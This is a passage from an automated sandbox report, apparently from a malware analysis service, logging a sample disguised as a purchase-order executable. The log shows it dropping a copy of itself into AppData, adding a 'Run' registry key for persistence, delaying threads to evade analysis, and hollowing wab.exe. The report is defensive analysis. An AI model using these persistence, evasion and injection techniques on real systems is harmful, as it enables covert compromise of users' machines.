              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04064327 push ds; iretd 9_2_04064407
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04063F57 pushfd ; ret 9_2_04063F58
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04064151 push es; iretd 9_2_0406416D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_04063D99 push ebp; iretd 9_2_04063DA2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exeJump to dropped file
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InsectaJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InsectaJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7068Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2659Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1980Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1668Thread sleep count: 1980 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 1980 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHT
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeAPI call chain: ExitProcess graph end nodegraph_0-3605
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeAPI call chain: ExitProcess graph end nodegraph_0-3600
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
